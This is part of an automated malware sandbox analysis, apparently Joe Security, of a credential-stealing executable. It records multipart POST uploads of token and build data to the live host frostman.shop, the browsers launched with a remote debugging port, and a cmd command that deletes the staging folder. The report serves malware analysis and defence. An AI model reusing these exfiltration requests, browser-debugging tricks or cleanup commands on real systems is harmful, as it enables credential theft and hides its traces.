                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 4c 4e 4f 48 44 4a 45 55 41 31 4e 59 55 33 4f 48 4c 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 4f 48 44 4a 45 55 41 31 4e 59 55 33 4f 48 4c 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 4f 48 44 4a 45 55 41 31 4e 59 55 33 4f 48 4c 4e 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------HLNOHDJEUA1NYU3OHLNYContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------HLNOHDJEUA1NYU3OHLNYContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------HLNOHDJEUA1NYU3OHLNYCont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC16355OUTData Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f
                                                                                                                                                                                                                                                                              Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC16355OUTData Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75
                                                                                                                                                                                                                                                                              Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC16355OUTData Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e
                                                                                                                                                                                                                                                                              Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC16355OUTData Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54
                                                                                                                                                                                                                                                                              Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC16355OUTData Raw: 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 2b 52 36 46 52 58 50 2b 43 34 5a 37 66 77 36 73 4d 38 54 52 62 4c 69 66 79 30 61 46 6f 51 45 38 78 69 75 45 59 6b 71 75 4d 59 47 54 67 59 72 6f 4b 47 49 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 4b 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 66 52 53 55 55 41 46 46 46 46 41 42 53 64 71 57 6b 6f 41 57 6b 6f 6f 6f 41 4b 4b 53 69 67 42 61 53 69 69 67 41 6f 6f 6f 6f 41 4b 4b 53 69 67 42 61 4b
                                                                                                                                                                                                                                                                              Data Ascii: Irhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv+R6FRXP+C4Z7fw6sM8TRbLify0aFoQE8xiuEYkquMYGTgYroKGIKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAfRSUUAFFFFABSdqWkoAWkoooAKKSigBaSiigAooooAKKSigBaK
                                                                                                                                                                                                                                                                              2024-12-20 06:32:09 UTC71OUTData Raw: 76 38 41 31 38 54 66 2b 67 78 31 54 71 35 4a 2f 77 41 67 57 31 2f 36 2b 4a 76 2f 41 45 47 4f 67 44 2f 2f 32 51 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4c 4e 4f 48 44 4a 45 55 41 31 4e 59 55 33 4f 48 4c 4e 59 2d 2d 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: v8A18Tf+gx1Tq5J/wAgW1/6+Jv/AEGOgD//2Q==------HLNOHDJEUA1NYU3OHLNY--
                                                                                                                                                                                                                                                                              2024-12-20 06:32:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:11 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              47192.168.2.749996116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:12 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----R9R900ZU37QQQQ9HVSRI
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:32:12 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 52 39 30 30 5a 55 33 37 51 51 51 51 39 48 56 53 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 52 39 52 39 30 30 5a 55 33 37 51 51 51 51 39 48 56 53 52 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 52 39 52 39 30 30 5a 55 33 37 51 51 51 51 39 48 56 53 52 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------R9R900ZU37QQQQ9HVSRIContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------R9R900ZU37QQQQ9HVSRIContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------R9R900ZU37QQQQ9HVSRICont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:13 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                              48192.168.2.750002116.203.12.1144436960C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                              2024-12-20 06:32:15 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3ECTJMGDTRQQQQ1DBIMO
                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                              Host: frostman.shop
                                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                              2024-12-20 06:32:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 4d 47 44 54 52 51 51 51 51 31 44 42 49 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 39 37 31 64 62 61 65 64 31 32 38 33 34 33 39 33 36 64 33 63 31 66 36 30 37 31 39 66 33 64 39 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 4d 47 44 54 52 51 51 51 51 31 44 42 49 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 30 32 39 31 32 31 64 37 30 63 64 30 66 36 39 31 61 61 32 33 66 33 37 34 62 61 64 62 33 32 66 0d 0a 2d 2d 2d 2d 2d 2d 33 45 43 54 4a 4d 47 44 54 52 51 51 51 51 31 44 42 49 4d 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                              Data Ascii: ------3ECTJMGDTRQQQQ1DBIMOContent-Disposition: form-data; name="token"4971dbaed128343936d3c1f60719f3d9------3ECTJMGDTRQQQQ1DBIMOContent-Disposition: form-data; name="build_id"2029121d70cd0f691aa23f374badb32f------3ECTJMGDTRQQQQ1DBIMOCont
                                                                                                                                                                                                                                                                              2024-12-20 06:32:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                              Date: Fri, 20 Dec 2024 06:32:15 GMT
                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                              2024-12-20 06:32:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                              Start time:01:31:02
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\pjthjsdjgjrtavv.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\pjthjsdjgjrtavv.exe"
                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                              File size:147'968 bytes
                                                                                                                                                                                                                                                                              MD5 hash:1D0FB45FAA5B7A8B398703596D67C967
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                              Start time:01:31:19
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                                              Start time:01:31:20
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2028,i,10443688959258362392,15587232465003949149,262144 /prefetch:8
                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c4390000
                                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                              Start time:02:42:11
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                                                              Start time:02:42:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2288 --field-trial-handle=2248,i,213816145862176203,3127195056463773546,262144 /prefetch:3
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                                              Start time:02:42:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                                                              Start time:02:42:12
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:3
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                                              Start time:02:42:16
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6832 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                                              Start time:02:42:16
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2044,i,5460801257270937399,511870453341011601,262144 /prefetch:8
                                                                                                                                                                                                                                                                              Imagebase:0x7ff7fb980000
                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                                              Start time:02:42:52
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\Z5PPP8Q1NYCB" & exit
                                                                                                                                                                                                                                                                              Imagebase:0x410000
                                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                                              Start time:02:42:52
                                                                                                                                                                                                                                                                              Start date:20/12/2024
                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
